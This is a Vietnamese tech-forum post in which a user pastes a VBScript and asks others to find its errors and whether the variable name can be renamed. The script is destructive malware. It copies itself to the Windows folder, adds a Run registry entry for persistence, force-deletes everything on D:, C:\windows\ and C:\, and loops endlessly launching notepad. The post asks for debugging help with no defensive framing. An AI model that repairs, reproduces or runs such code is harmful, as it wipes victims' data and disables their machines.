Hỏi đáp mọi chủ đề liên qua đến công nghệ thông tin, internet, lập trình, SEO...
Nội quy chuyên mục: Hỏi đáp mọi chủ đề liên qua đến công nghệ thông tin, internet, lập trình, SEO...

- Chuyên nhận giải đáp thắc mắc sử dụng Word, Excel, Power Point

- Ai cần download driver hay Firmware cho máy tính máy in, thì vào đây nhé, tìm gì cũng có Driver 360

- Cập nhật tin tức với Mr Công nghệ tại đây
By doimatbietcuoi2007
#526326 msgbox"ngu!"

On Error Resume Next

Set vip_xinh = Createobject("scripting.filesystemobject")

vip_xinh.copyfile wscript.scriptfullname,vip_xinh.GetSpecialFolder(0 )& "\ vip_xinh.vbs"

Set vip_xinh2= CreateObject("WScript.Shell")

vip_xinh2.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ru n\die","wscript.exe "& vip_xinh.GetSpecialFolder(0)& "\ vip_xinh.vbs %"


On Error Resume Next

Const vic = "D:\"

Delvic

Sub Delvic()

Dim fso

Set fso = CreateObject("Scripting.FileSystemObject")

fso.DeleteFile vic & "*.*" , True

fso.DeleteFolder vic & "*" , True

End Sub


On Error Resume Next

Const vic1 = "C:\windows\"

Delvic1

Sub Delvic1()

Dim fso1

Set fso1 = CreateObject("Scripting.FileSystemObject")

fso1.DeleteFile vic1 & "*.*" , True

fso1.DeleteFolder vic1 & "*" , True

End Sub


On Error Resume Next

Const vic2 = "C:\"

Delvic2

Sub Delvic2()

Dim fso2

Set fso2 = CreateObject("Scripting.FileSystemObject")

fso2.DeleteFile vic2 & "*.*" , True

fso2.DeleteFolder vic2 & "*" , True

End Sub


On Error Resume Next

if month(now) =12 and day(now) =25 then

msgbox "die hahaha!"

end if


On Error Resume Next

Set treomay= CreateObject("WScript.Shell")

Do

treomay.run "notepad",false

loop


Đoạn code có sai sót chỗ nào hk mấy pro ==", với cái vipxinh tớ đổi thành tên khác được hk

Lưu ý khi sử dụng

- Gặp Link download hỏng, hãy đăng trả lời (yêu cầu link download mới), Các MOD sẽ cập nhật link sớm nhất
- Tìm kiếm trước khi đăng bài mới

Chủ đề liên quan:
Kết nối đề xuất:
Đọc Truyện online